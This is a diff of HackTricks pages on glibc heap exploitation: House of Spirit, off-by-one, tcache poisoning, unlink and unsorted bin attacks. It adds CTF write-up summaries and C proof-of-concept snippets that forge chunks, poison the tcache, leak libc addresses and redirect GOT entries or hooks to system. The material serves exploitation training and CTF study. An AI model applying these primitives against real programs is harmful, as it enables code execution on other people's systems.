**Objective**: Create an overlapping chunk by manipulating the size of a fastbin chunk.
|
||||
|
||||
|
@ -38,7 +38,7 @@ unsigned long* chunk2 = malloc(0x40); // Allocates another chunk of 0x40 bytes
|
|||
malloc(0x10); // Allocates a small chunk to change the fastbin state
|
||||
```
|
||||
|
||||
We allocate two chunks of 0x40 bytes each. These chunks will be placed in the fastbin list once freed.
|
||||
We allocate two chunks of 0x40 bytes each. These chunks will be placed in the fast bin list once freed.
|
||||
|
||||
* **Step 2: Free Chunks**
|
||||
|
||||
|
@ -63,13 +63,13 @@ We change the size metadata of `chunk1` to 0xa1. This is a crucial step to trick
|
|||
malloc(0x1000); // Allocate a large chunk to trigger heap consolidation
|
||||
```
|
||||
|
||||
Allocating a large chunk triggers the `malloc_consolidate` function, merging small chunks in the fastbin. The manipulated size of `chunk1` causes it to overlap with `chunk2`.
|
||||
Allocating a large chunk triggers the `malloc_consolidate` function, merging small chunks in the fast bin. The manipulated size of `chunk1` causes it to overlap with `chunk2`.
|
||||
|
||||
After consolidation, `chunk1` overlaps with `chunk2`, allowing for further exploitation.
|
||||
|
||||
### POC 2: Modify the FD Pointer
|
||||
### POC 2: Modify the `fd` pointer
|
||||
|
||||
**Objective**: Create a fake chunk by manipulating the fastbin fd pointer.
|
||||
**Objective**: Create a fake chunk by manipulating the fast bin `fd` pointer.
|
||||
|
||||
* **Step 1: Allocate Chunks**
|
||||
|
||||
|
@ -80,7 +80,7 @@ unsigned long* chunk2 = malloc(0x100); // Allocates a chunk of 0x100 bytes at 0x
|
|||
|
||||
**Explanation**: We allocate two chunks, one smaller and one larger, to set up the heap for the fake chunk.
|
||||
|
||||
* **Step 2: Create Fake Chunk**
|
||||
* **Step 2: Create fake chunk**
|
||||
|
||||
```cpp
|
||||
chunk2[1] = 0x31; // Fake chunk size 0x30
|
||||
|
@ -90,7 +90,7 @@ chunk2[11] = 0x21; // Next-next fake chunk
|
|||
|
||||
We write fake chunk metadata into `chunk2` to simulate smaller chunks.
|
||||
|
||||
* **Step 3: Free Chunk1**
|
||||
* **Step 3: Free `chunk1`**
|
||||
|
||||
```cpp
|
||||
free(chunk1); // Frees the chunk at 0x602000
|
||||
|
@ -98,13 +98,13 @@ free(chunk1); // Frees the chunk at 0x602000
|
|||
|
||||
**Explanation**: We free `chunk1`, adding it to the fastbin list.
|
||||
|
||||
* **Step 4: Modify FD of Chunk1**
|
||||
* **Step 4: Modify `fd` of `chunk1`**
|
||||
|
||||
```cpp
|
||||
chunk1[0] = 0x602060; // Modify the fd of chunk1 to point to the fake chunk within chunk2
|
||||
```
|
||||
|
||||
**Explanation**: We change the forward pointer (fd) of `chunk1` to point to our fake chunk inside `chunk2`.
|
||||
**Explanation**: We change the forward pointer (`fd`) of `chunk1` to point to our fake chunk inside `chunk2`.
|
||||
|
||||
* **Step 5: Trigger `malloc_consolidate`**
|
||||
|
||||
|
@ -118,7 +118,7 @@ The fake chunk becomes part of the fastbin list, making it a legitimate chunk fo
|
|||
|
||||
### Summary
|
||||
|
||||
The **House of Rabbit** technique involves either modifying the size of a fastbin chunk to create overlapping chunks or manipulating the fd pointer to create fake chunks. This allows attackers to forge legitimate chunks in the heap, enabling various forms of exploitation. Understanding and practicing these steps will enhance your heap exploitation skills.
|
||||
The **House of Rabbit** technique involves either modifying the size of a fast bin chunk to create overlapping chunks or manipulating the `fd` pointer to create fake chunks. This allows attackers to forge legitimate chunks in the heap, enabling various forms of exploitation. Understanding and practicing these steps will enhance your heap exploitation skills.
|
||||
|
||||
<details>
|
||||
|
||||
|
|
|
@ -71,7 +71,7 @@ int main() {
|
|||
|
||||
### Goal
|
||||
|
||||
* Be able to add into the tcache / fast bin an address so later it's possible to alloc it
|
||||
* Be able to add into the tcache / fast bin an address so later it's possible to allocate it
|
||||
|
||||
### Requirements
|
||||
|
||||
|
@ -114,11 +114,15 @@ Note that it's necessary to create the second chunk in order to bypass some sani
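A minimal sketch of the tcache variant of the technique (assuming glibc ≥ 2.26). On this path `free()` only checks that the fake size field is aligned and at least MINSIZE; the classic fast-bin variant additionally needs the "second chunk" with a sane size mentioned above.

```c
#include <stdio.h>
#include <stdlib.h>

int main(void) {
    // Fake chunk crafted on the stack: [prev_size][size][user data...]; 16-byte alignment
    // is required by free()'s pointer checks (GCC/Clang attribute used for the sketch).
    unsigned long fake[8] __attribute__((aligned(16))) = {0};
    fake[1] = 0x40;                 // fake size field: aligned and >= MINSIZE

    void *victim = &fake[2];        // what a pointer returned by malloc() would look like
    free(victim);                   // the fake chunk lands in the 0x40 tcache bin
    void *p = malloc(0x38);         // and malloc() now hands back our stack address
    printf("fake chunk: %p  malloc returned: %p\n", (void *)&fake[2], p);
    return 0;
}
```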
|
|||
|
||||
## Examples
|
||||
|
||||
* CTF [https://guyinatuxedo.github.io/39-house\_of\_spirit/hacklu14\_oreo/index.html](https://guyinatuxedo.github.io/39-house\_of\_spirit/hacklu14\_oreo/index.html)
|
||||
* **CTF** [**https://guyinatuxedo.github.io/39-house\_of\_spirit/hacklu14\_oreo/index.html**](https://guyinatuxedo.github.io/39-house\_of\_spirit/hacklu14\_oreo/index.html)
|
||||
* **Libc infoleak**: Via an overflow it's possible to change a pointer to point to a GOT address in order to leak a libc address via the read action of the CTF
|
||||
* **House of Spirit**: Abusing a counter that counts the number of "rifles" it's possible to generate a fake size of the first fake chunk, then abusing a "message" it's possible to fake the second size of a chunk and finally abusing an overflow it's possible to change a pointer that is going to be freed so our first fake chunk is freed. Then, we can allocate it and inside of it there is going to be the address to where "message" is stored. Then, it's possible to make this point to the `scanf` entry inside the GOT table, so we can overwrite it with the address of `system`.\
|
||||
Next time `scanf` is called, we can send the input `"/bin/sh"` and get a shell.
|
||||
|
||||
* [**Gloater. HTB Cyber Apocalypse CTF 2024**](https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/gloater/)
|
||||
* **Glibc leak**: Uninitialized stack buffer.
|
||||
* **House of Spirit**: We can modify the first index of a global array of heap pointers. With a single byte modification, we use `free` on a fake chunk inside a valid chunk, so that we get an overlapping chunks situation after allocating again. With that, a simple Tcache poisoning attack works to get an arbitrary write primitive.
|
||||
|
||||
## References
|
||||
|
||||
* [https://heap-exploitation.dhavalkapil.com/attacks/house\_of\_spirit](https://heap-exploitation.dhavalkapil.com/attacks/house\_of\_spirit)
|
||||
|
|
|
@ -63,6 +63,13 @@ This could be used to **overwrite the `global_max_fast` global variable** of lib
|
|||
|
||||
You can find another great explanation of this attack in [**guyinatuxedo**](https://guyinatuxedo.github.io/32-largebin\_attack/largebin\_explanation0/index.html).
|
||||
|
||||
### Other examples
|
||||
|
||||
* [**La casa de papel. HackOn CTF 2024**](https://7rocky.github.io/en/ctf/other/hackon-ctf/la-casa-de-papel/)
|
||||
* Large bin attack in the same situation as it appears in [**how2heap**](https://github.com/shellphish/how2heap/blob/master/glibc\_2.35/large\_bin\_attack.c).
|
||||
* The write primitive is more complex, because `global_max_fast` is useless here.
|
||||
* FSOP is needed to finish the exploit.
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
|
|
@ -16,18 +16,19 @@ Other ways to support HackTricks:
|
|||
|
||||
## Basic Information
|
||||
|
||||
Having just access to a 1B overflow allows an attacker to modify the `pre_in_use` bit from the next chunk and as the current chunk won't be in use, the end of the chunk becomes the previous chunk size metadata information.\
|
||||
This allows to tamper which chunks are actually freed, potentially generating a chunk that contains another legit chunk.
|
||||
Having just access to a 1B overflow allows an attacker to modify the `size` field of the next chunk. This makes it possible to tamper with which chunks are actually freed, potentially generating a chunk that contains another legit chunk. The exploitation is similar to [double free](double-free.md) or overlapping chunks.
|
||||
|
||||
There are 2 types of off by one vulnerabilities:
|
||||
|
||||
* Arbitrary byte: This kind allows overwriting that byte with any value
|
||||
* Null off by one: This kind allows to overwrite that byte only with 0x00
|
||||
* A common example of this vulnerability can be seen in the following code where the behavior of strlen and strcpy is inconsistent, which allows set a 0x00 byte in the beginning of the next chunk.
|
||||
* Null byte (off-by-null): This kind allows overwriting that byte only with 0x00
|
||||
* A common example of this vulnerability can be seen in the following code where the behavior of `strlen` and `strcpy` is inconsistent, which allows setting a 0x00 byte at the beginning of the next chunk.
|
||||
* This can be exploited with the [House of Einherjar](house-of-einherjar.md).
|
||||
* If using Tcache, this can be leveraged to a [double free](double-free.md) situation.
|
||||
|
||||
<details>
|
||||
|
||||
<summary>Null off by one</summary>
|
||||
<summary>Off-by-null</summary>
|
||||
|
||||
```c
|
||||
// From https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/off_by_one/
|
||||
|
@ -50,7 +51,7 @@ int main(void)
|
|||
|
||||
Among other checks, now whenever a chunk is freed the previous size is compared with the size configured in the chunk's metadata, making this attack fairly complex from version 2.28.
|
||||
|
||||
### Code Example:
|
||||
### Code example:
|
||||
|
||||
* [https://github.com/DhavalKapil/heap-exploitation/blob/d778318b6a14edad18b20421f5a06fa1a6e6920e/assets/files/shrinking\_free\_chunks.c](https://github.com/DhavalKapil/heap-exploitation/blob/d778318b6a14edad18b20421f5a06fa1a6e6920e/assets/files/shrinking\_free\_chunks.c)
|
||||
* This attack is no longer working due to the use of Tcaches.
|
||||
|
@ -62,12 +63,21 @@ Among other checks, now whenever a chunk is free the previous size is compared w
|
|||
|
||||
### Requirements
|
||||
|
||||
* Off by one overflow to modify the previous size metadata information
|
||||
* Off by one overflow to modify the size metadata information
|
||||
|
||||
### Attack
|
||||
### General off-by-one attack
|
||||
|
||||
* Allocate three chunks `A`, `B` and `C` (say sizes 0x20), and another one to prevent consolidation with the top chunk (a sketch of the full sequence follows this list).
|
||||
* Free `C` (inserted into 0x20 Tcache free-list).
|
||||
* Use chunk `A` to overflow on `B`. Abuse off-by-one to modify the `size` field of `B` from 0x21 to 0x41.
|
||||
* Now we have `B` containing the free chunk `C`
|
||||
* Free `B` and allocate a 0x40 chunk (it will be placed here again)
|
||||
* We can modify the `fd` pointer of `C`, which is still free (Tcache poisoning)
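A minimal sketch of that sequence (assuming glibc ≥ 2.26 with tcache; in a real exploit the one-byte write into `A[0x18]` would come from the vulnerable program, here it is done directly to show the layout):

```c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

int main(void) {
    uint8_t *A = malloc(0x18);   // chunk size 0x20 (size field 0x21)
    uint8_t *B = malloc(0x18);
    uint8_t *C = malloc(0x18);
    malloc(0x18);                // guard against consolidation with the top chunk

    free(C);                     // C goes into the 0x20 tcache bin

    A[0x18] = 0x41;              // off-by-one: B's size field goes from 0x21 to 0x41
    free(B);                     // B now enters the 0x40 tcache bin
    uint8_t *B2 = malloc(0x38);  // B is handed back, but now it overlaps C

    // C's tcache "next" pointer sits at the start of C's user data, i.e. at B2 + 0x20:
    // overwriting it from B2 is the Tcache-poisoning primitive (mangled with >>12 on glibc >= 2.32).
    printf("B2=%p C=%p -> C's next pointer is inside B2 at %p\n",
           (void *)B2, (void *)C, (void *)(B2 + 0x20));
    return 0;
}
```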
|
||||
|
||||
### Off-by-null attack
|
||||
|
||||
* 3 chunks of memory (a, b, c) are reserved one after the other. Then the middle one is freed. The first one contains an off by one overflow vulnerability and the attacker abuses it with a 0x00 (if the previous byte was 0x10 it would make the middle chunk indicate that it’s 0x10 smaller than it really is).
|
||||
* Then, 2 more smaller chunks are allocated in the middle freed chunk (b), however, as `b + b->size` never updates the c chunk because the pointed address is smaller than it should. 
|
||||
* Then, 2 more smaller chunks are allocated in the middle freed chunk (b); however, as `b + b->size` now points before the real end of b, the `prev_size` field of the c chunk is never updated.
|
||||
* Then, b1 and c get freed. As `c - c->prev_size` still points to b (b1 now), both are consolidated into one chunk. However, b2 is still in between b1 and c.
|
||||
* Finally, a new malloc is performed reclaiming this memory area which is actually going to contain b2, allowing the owner of the new malloc to control the content of b2.
|
||||
|
||||
|
@ -78,6 +88,9 @@ This image explains perfectly the attack:
|
|||
## Other Examples & References
|
||||
|
||||
* [**https://heap-exploitation.dhavalkapil.com/attacks/shrinking\_free\_chunks**](https://heap-exploitation.dhavalkapil.com/attacks/shrinking\_free\_chunks)
|
||||
* [**Bon-nie-appetit. HTB Cyber Apocalypse CTF 2022**](https://7rocky.github.io/en/ctf/htb-challenges/pwn/bon-nie-appetit/)
|
||||
* Off-by-one because of `strlen` considering the next chunk's `size` field.
|
||||
* Tcache is being used, so a general off-by-one attacks works to get an arbitrary write primitive with Tcache poisoning.
|
||||
* [**Asis CTF 2016 b00ks**](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/off\_by\_one/#1-asis-ctf-2016-b00ks)
|
||||
* It's possible to abuse an off by one to leak an address from the heap because the 0x00 byte at the end of a string is overwritten by the next field.
|
||||
* Arbitrary write is obtained by abusing the off by one write to make the pointer point to another place where a fake struct with fake pointers will be built. Then, it's possible to follow the pointer of this struct to obtain an arbitrary write.
|
||||
|
|
|
@ -18,7 +18,7 @@ Several of the proposed heap exploitation techniques need to be able to overwrit
|
|||
|
||||
### Simple Use After Free
|
||||
|
||||
If it's possible for the attacker to **write info in a free chunk**, he could abuse this to overwrite the needed pointers.
|
||||
If it's possible for the attacker to **write info in a free chunk**, they could abuse this to overwrite the needed pointers.
|
||||
|
||||
### Double Free
|
||||
|
||||
|
@ -28,9 +28,9 @@ If the attacker can **`free` two times the same chunk** (free other chunks in be
|
|||
|
||||
It might be possible to **overflow an allocated chunk that has a freed chunk next to it** and modify some of its headers/pointers.
|
||||
|
||||
### Off by 1 Overflow
|
||||
### Off-by-one overflow
|
||||
|
||||
In this case it would be possible to **modify the size** of the following chunk in memory. An attacker could abuse this to **make an allocated chunk have a bigger size**, then **`free`** it, making the chunk been **added to a bin of a different** size (bigger), then allocate the **fake size**, and the attack will have access to a **chunk with a size which is bigger** than it really is, **granting therefore a heap overflow** (check previous section).
|
||||
In this case it would be possible to **modify the size** of the following chunk in memory. An attacker could abuse this to **make an allocated chunk have a bigger size**, then **`free`** it, making the chunk be **added to a bin of a different** size (bigger), then allocate the **fake size**, and the attacker will have access to a **chunk with a size which is bigger** than it really is, **granting therefore an overlapping chunks situation**, which is exploitable in the same way as a **heap overflow** (check the previous section).
|
||||
|
||||
<details>
|
||||
|
||||
|
|
|
@ -16,21 +16,21 @@ Other ways to support HackTricks:
|
|||
|
||||
## Basic Information
|
||||
|
||||
For more information about what is a tcache bin check this page:
|
||||
For more information about what is a Tcache bin check this page:
|
||||
|
||||
{% content-ref url="bins-and-memory-allocations.md" %}
|
||||
[bins-and-memory-allocations.md](bins-and-memory-allocations.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
First of all, note that the Tcache was introduced in glibc version 2.26.
|
||||
First of all, note that the Tcache was introduced in Glibc version 2.26.
|
||||
|
||||
The **Tcache** attack proposed in the [**guyinatuxido page**](https://guyinatuxedo.github.io/29-tcache/tcache\_explanation/index.html) is very similar to the fast bin attack where the goal is to overwrite the pointer to the next chunk in the bin inside a freed chunk to an arbitrary address so later it's possible to **allocate that specific address and potentially overwrite pointes**.
|
||||
The **Tcache attack** (also known as **Tcache poisoning**) proposed in the [**guyinatuxedo page**](https://guyinatuxedo.github.io/29-tcache/tcache\_explanation/index.html) is very similar to the fast bin attack where the goal is to overwrite the pointer to the next chunk in the bin inside a freed chunk to an arbitrary address so later it's possible to **allocate that specific address and potentially overwrite pointers**.
|
||||
|
||||
However, nowadays, if you run the mentioned code you will get the error: **`malloc(): unaligned tcache chunk detected`**. So, you need to write an aligned address in the new pointer (or execute the binary enough times so the written address is actually aligned).
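A minimal sketch of the poisoning (assuming glibc ≥ 2.32 with safe-linking; on 2.26–2.31 you would store the target address directly instead of the mangled value). `target` is a hypothetical variable we want malloc to return:

```c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

// Hypothetical target; it must be 16-byte aligned to pass the "unaligned tcache chunk" check.
static long target[4] __attribute__((aligned(16)));

int main(void) {
    uintptr_t *a = malloc(0x28);
    uintptr_t *b = malloc(0x28);
    free(a);
    free(b);                                  // 0x30 tcache bin: b -> a

    // The write a UAF/overflow primitive would perform for us:
    // safe-linking stores (&chunk >> 12) ^ next, so the target is mangled the same way.
    b[0] = ((uintptr_t)b >> 12) ^ (uintptr_t)target;

    malloc(0x28);                             // returns b; the tcache head becomes `target`
    long *evil = malloc(0x28);                // returns our target address
    printf("target=%p evil=%p\n", (void *)target, (void *)evil);
    return 0;
}
```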
|
||||
|
||||
### Tcache indexes attack
|
||||
|
||||
Usually it's possible to find at the beginning of the heap a chunk containing the **amount of chunks per index** inside the tcache and the address to the **head chunk of each tcache index**. If for some reason it's possible to modify this information, it would be possible to **make the head chunk of some index point to a desired address** (like malloc hook) to then allocated a chunk of the size of the index and overwrite the contents of malloc hook in this case.
|
||||
Usually it's possible to find at the beginning of the heap a chunk containing the **amount of chunks per index** inside the tcache and the address to the **head chunk of each tcache index**. If for some reason it's possible to modify this information, it would be possible to **make the head chunk of some index point to a desired address** (like `__malloc_hook`) to then allocate a chunk of the size of the index and overwrite the contents of `__malloc_hook` in this case.
|
||||
|
||||
## Examples
|
||||
|
||||
|
@ -50,6 +50,11 @@ Usually it's possible to find at the beginning of the heap a chunk containing th
|
|||
* CTF [https://guyinatuxedo.github.io/44-more\_tcache/csaw19\_popping\_caps1/index.html](https://guyinatuxedo.github.io/44-more\_tcache/csaw19\_popping\_caps1/index.html)
|
||||
* Same vulnerability as before with one extra restriction
|
||||
* **Tcache indexes attack**: Similar attack to the previous one but using fewer steps by **freeing the chunk that contains the tcache info** so its address is added to the tcache index of its size, making it possible to allocate that size and get the tcache info chunk as a chunk, which allows adding the free hook as the head address of one index, allocating it, and writing a one gadget in it.
|
||||
* [**Math Door. HTB Cyber Apocalypse CTF 2023**](https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/math-door/)
|
||||
* **Write After Free** to add a number to the `fd` pointer.
|
||||
* A lot of **heap feng-shui** is needed in this challenge. The writeup shows how **controlling the head of the Tcache** free-list is pretty handy.
|
||||
* **Glibc leak** through `stdout` (FSOP).
|
||||
* **Tcache poisoning** to get an arbitrary write primitive.
|
||||
|
||||
<details>
|
||||
|
||||
|
|
|
@ -120,7 +120,7 @@ This attack allows to **change a pointer to a chunk to point 3 addresses before
|
|||
* When the second chunk is freed then this fake chunk is unlinked happening:
|
||||
* `fake_chunk->fd->bk` = `fake_chunk->bk`
|
||||
* `fake_chunk->bk->fd` = `fake_chunk->fd`
|
||||
* Previously it was made that `fake_chunk->fd->bk` and `fake_chunk->fd->bk` point to the same place (the location in the stack where `chunk1` was stored, so it was a valid linked list). As **both are pointing to the same location** only the last one (`fake_chunk->bk->fd = fake_chunk->fd`) will take **effect**.
|
||||
* Previously it was made that `fake_chunk->fd->bk` and `fake_chunk->bk->fd` point to the same place (the location in the stack where `chunk1` was stored, so it was a valid linked list). As **both are pointing to the same location** only the last one (`fake_chunk->bk->fd = fake_chunk->fd`) will take **effect**.
|
||||
* This will **overwrite the pointer to chunk1 in the stack with the address (or bytes) stored 3 addresses before in the stack**.
|
||||
* Therefore, if an attacker could control the content of chunk1 again, they would be able to **write inside the stack**, potentially overwriting the return address (skipping the canary) and modifying the values and pointers of local variables. They could even modify again the address of chunk1 stored in the stack to a different location so that, if they could control the content of chunk1 once more, they would be able to write anywhere.
|
||||
* Note that this was possible because the **addresses are stored in the stack**. The risk and exploitation might depend on **where the addresses to the fake chunk are being stored** (a toy model of the unlink step follows below).
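A toy model of the simplified unlink step the list above walks through (only the `fd`/`bk` fields of glibc's `malloc_chunk` are kept; the check and the two writes mirror the allocator's logic):

```c
#include <stdio.h>
#include <stdlib.h>

struct chunk { struct chunk *fd, *bk; };

static void unlink_chunk(struct chunk *p) {
    struct chunk *fd = p->fd, *bk = p->bk;
    if (fd->bk != p || bk->fd != p) {   // the "corrupted double-linked list" sanity check
        fprintf(stderr, "corrupted double-linked list\n");
        exit(1);
    }
    fd->bk = bk;   // fake_chunk->fd->bk = fake_chunk->bk
    bk->fd = fd;   // fake_chunk->bk->fd = fake_chunk->fd  <- the write that overwrites the stored pointer
}

int main(void) {
    struct chunk a, b, c;                       // a <-> b <-> c, a tiny circular bin list
    a.fd = &b; b.bk = &a; b.fd = &c; c.bk = &b;
    c.fd = &a; a.bk = &c;
    unlink_chunk(&b);                           // removing b rewrites a.fd and c.bk
    printf("a.fd=%p (&c=%p)  c.bk=%p (&a=%p)\n", (void *)a.fd, (void *)&c, (void *)c.bk, (void *)&a);
    return 0;
}
```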
|
||||
|
|
|
@ -22,28 +22,28 @@ For more information about what is an unsorted bin check this page:
|
|||
[bins-and-memory-allocations.md](bins-and-memory-allocations.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
Unsorted lists are able to write the address to `unsorted_chunks (av)` in the `bk` address of the chunk. Therefore, if an attacker can **modify the address of the bk pointer** in a chunk inside the unsorted bin, he could be able to **write that address in an arbitrary address** which could be helpful to leak a libc addresses or bypass some defense.
|
||||
Unsorted lists are able to write the address to `unsorted_chunks (av)` in the `bk` address of the chunk. Therefore, if an attacker can **modify the address of the `bk` pointer** in a chunk inside the unsorted bin, they could be able to **write that address to an arbitrary address**, which could be helpful to leak Glibc addresses or bypass some defense.
|
||||
|
||||
So, basically, this attack allowed to **overwrite some arbitrary address with a big number** (an address which could be a heap address or a libc address) like some stack address that could be leak or some restriction like the global variable **`global_max_fast`** to allow to create fast bin bins with bigger sizes (and pass from an unsorted bin atack to a fast bin attack).
|
||||
So, basically, this attack allows **setting a big number at an arbitrary address**. This big number is an address, which could be a heap address or a Glibc address. A typical target is **`global_max_fast`**, to allow creating fast bins with bigger sizes (and pass from an unsorted bin attack to a fast bin attack).
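A toy model of the removal step in older glibc's `_int_malloc` (before the extra checks added around 2.28) that makes this write possible; the attacker only controls `victim->bk`:

```c
#include <stdio.h>
#include <stdint.h>

struct chunk { size_t prev_size, size; struct chunk *fd, *bk; };

int main(void) {
    struct chunk bin_head = {0};   // stands in for unsorted_chunks(av) inside main_arena
    struct chunk victim   = {0};   // the freed chunk whose bk the attacker corrupts
    uint64_t target[4]    = {0};   // the arbitrary address we want to hit

    // Attacker primitive: victim->bk = target - 0x10, so that bck->fd lands exactly on target
    victim.bk = (struct chunk *)((char *)target - 2 * sizeof(size_t));

    // What the allocator does when taking `victim` off the unsorted bin:
    struct chunk *bck = victim.bk;
    bin_head.bk = bck;
    bck->fd = &bin_head;           // *target now holds a main_arena-like address (the "big number")

    printf("target[0] = %p (address of the bin head)\n", (void *)target[0]);
    return 0;
}
```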
|
||||
|
||||
{% hint style="success" %}
|
||||
Taking a look to the example provided in [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted\_bin\_attack/#principle](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted\_bin\_attack/#principle) and using 0x4000 and 0x5000 instead of 0x400 and 0x500 as chunk sizes (to avoid tcaches) it's possible to see that **nowadays** the error **`malloc(): unsorted double linked list corrupted`** is triggered.
|
||||
Taking a look to the example provided in [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted\_bin\_attack/#principle](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted\_bin\_attack/#principle) and using 0x4000 and 0x5000 instead of 0x400 and 0x500 as chunk sizes (to avoid Tcache) it's possible to see that **nowadays** the error **`malloc(): unsorted double linked list corrupted`** is triggered.
|
||||
|
||||
Therefore, this unsorted bin attack now (among other checks) also requires to be able to fix the doubled linked list so this is bypassed `victim->bck->fd == victim` or not `victim->fd == av (arena)`. Which means that the address were we want to right must have the address of the fake chunk in its `fd` position and that the fake chunk `fd` is pointing to the arena.
|
||||
Therefore, this unsorted bin attack now (among other checks) also requires being able to fix the doubly linked list so that `victim->bk->fd == victim` and `victim->fd == unsorted_chunks (av)` hold, which means that the address where we want to write must have the address of the fake chunk in its `fd` position and that the fake chunk's `fd` is pointing to the arena.
|
||||
{% endhint %}
|
||||
|
||||
{% hint style="danger" %}
|
||||
Note that this attack corrupts the unsorted bin (hence small and large too). So we can only **use allocations from the fast bin now** (a more complex program might do other allocations and crash), and to trigger this we must **alloc the same size or the program will crash.**
|
||||
Note that this attack corrupts the unsorted bin (hence small and large too). So we can only **use allocations from the fast bin now** (a more complex program might do other allocations and crash), and to trigger this we must **allocate the same size or the program will crash.**
|
||||
|
||||
Note that making **`global_max_fast`** might help in this case trusting that the fast bin will be able to take care of all the other allocations until the exploit is completed.
|
||||
Note that overwriting **`global_max_fast`** might help in this case trusting that the fast bin will be able to take care of all the other allocations until the exploit is completed.
|
||||
{% endhint %}
|
||||
|
||||
The code from [**guyinatuxedo**](https://guyinatuxedo.github.io/31-unsortedbin\_attack/unsorted\_explanation/index.html) explains it very well, although if you modify the mallocs to allocate memory big enough so don't end in a tcache you can see that the previously mentioned error appears preventing this technique: **`malloc(): unsorted double linked list corrupted`**
|
||||
The code from [**guyinatuxedo**](https://guyinatuxedo.github.io/31-unsortedbin\_attack/unsorted\_explanation/index.html) explains it very well, although if you modify the mallocs to allocate memory big enough so it doesn't end up in the Tcache, you can see that the previously mentioned error appears, preventing this technique: **`malloc(): unsorted double linked list corrupted`**
|
||||
|
||||
## Unsorted Bin Infoleak Attack
|
||||
|
||||
This is actually a very basic concept. The chunks in the unsorted bin are going to be having pointers double pointers to create the bin. The first chunk in the unsorted bin will actually have the **FD** and the **BK** links **pointing to a part of the main arena (libc)**.\
|
||||
Therefore, if you can **put a chunk inside a unsorted bin and read it** (use after free) or **allocate it again without overwriting at least 1 of the pointers** to then **read** it, you can have a **libc info leak**.
|
||||
This is actually a very basic concept. The chunks in the unsorted bin are going to have pointers. The first chunk in the unsorted bin will actually have the **`fd`** and the **`bk`** links **pointing to a part of the main arena (Glibc)**.\
|
||||
Therefore, if you can **put a chunk inside an unsorted bin and read it** (use after free) or **allocate it again without overwriting at least 1 of the pointers** to then **read** it, you can have a **Glibc info leak**.
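A minimal use-after-free sketch of this leak (glibc-version dependent; the chunk is made larger than the tcache maximum so `free()` sends it to the unsorted bin):

```c
#include <stdio.h>
#include <stdlib.h>

int main(void) {
    long *a = malloc(0x500);   // larger than the tcache maximum (0x408 bytes of user data)
    malloc(0x18);              // guard chunk: prevents consolidation with the top chunk
    free(a);                   // a goes to the unsorted bin; its fd/bk now point into main_arena

    // Use-after-free read: both values are addresses inside libc's main_arena
    printf("fd: %p  bk: %p\n", (void *)a[0], (void *)a[1]);
    return 0;
}
```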
|
||||
|
||||
A similar [**attack used in this writeup**](https://guyinatuxedo.github.io/33-custom\_misc\_heap/csaw18\_alienVSsamurai/index.html) was to abuse a 4-chunk structure (A, B, C and D - D is only to prevent consolidation with the top chunk): a null byte overflow in B was used to make C indicate that B was unused. Also, in B the `prev_size` data was modified so the size, instead of being the size of B, was A+B.\
|
||||
Then C was deallocated and consolidated with A+B (while B was still in use). A new chunk of size A was allocated and then the libc addresses (the unsorted bin pointers) were written into B, from where they were leaked.
|
||||
|
@ -79,6 +79,10 @@ Then C was deallocated, and consolidated with A+B (but B was still in used). A n
|
|||
* And finally a chunk containing the string `/bin/sh\x00` is freed calling the delete function, triggering the **`__free_hook`** function which points to system with `/bin/sh\x00` as parameter.
|
||||
* **CTF** [**https://guyinatuxedo.github.io/33-custom\_misc\_heap/csaw19\_traveller/index.html**](https://guyinatuxedo.github.io/33-custom\_misc\_heap/csaw19\_traveller/index.html)
|
||||
* Another example of abusing a 1B overflow to consolidate chunks in the unsorted bin and get a libc infoleak and then perform a fast bin attack to overwrite malloc hook with a one gadget address
|
||||
* [**Robot Factory. BlackHat MEA CTF 2022**](https://7rocky.github.io/en/ctf/other/blackhat-ctf/robot-factory/)
|
||||
* We can only allocate chunks of size greater than `0x100`.
|
||||
* Overwrite `global_max_fast` using an Unsorted Bin attack (works 1/16 times due to ASLR, because we need to modify 12 bits, but we must modify 16 bits).
|
||||
* Fast Bin attack to modify a global array of chunks. This gives an arbitrary read/write primitive, which allows modifying the GOT and setting some function to point to `system`.
|
||||
|
||||
<details>
|
||||
|
||||
|
|